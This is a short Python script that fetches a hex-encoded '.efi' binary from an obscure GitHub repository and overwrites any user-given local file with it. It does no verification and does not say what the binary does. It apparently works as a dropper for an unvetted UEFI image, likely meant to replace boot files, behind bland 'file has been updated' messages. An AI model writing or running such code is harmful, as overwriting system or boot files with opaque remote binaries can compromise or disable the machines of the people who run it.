import requests
import sys

def replace_file_with_hex_content(local_path: str, remote_url: str):
    try:
        print(f"Getting hex from: {remote_url}")
        response = requests.get(remote_url)
        response.raise_for_status()

        hex_string = ''.join(response.text.split())
        
        if not hex_string:
            raise ValueError("Hex is empty")

        if len(hex_string) % 2 != 0:
            raise ValueError("Incorrect hex")

        binary_data = bytes.fromhex(hex_string)

        print(f"Запись {len(binary_data)} байт в файл: {local_path}")
        with open(local_path, 'wb') as f:
            f.write(binary_data)

        print("File has been updated")

    except Exception as e:
        print(f"Error: {e}", file=sys.stderr)
        sys.exit(1)

if __name__ == "__main__":
    REMOTE_URL = "https://raw.githubusercontent.com/chCelera/baranyeban/refs/heads/main/mamkapapka.efi"
    path = input("Path: ").strip()
    if not path:
        print("Path does not exist", file=sys.stderr)
        sys.exit(1)
    replace_file_with_hex_content(path, REMOTE_URL)
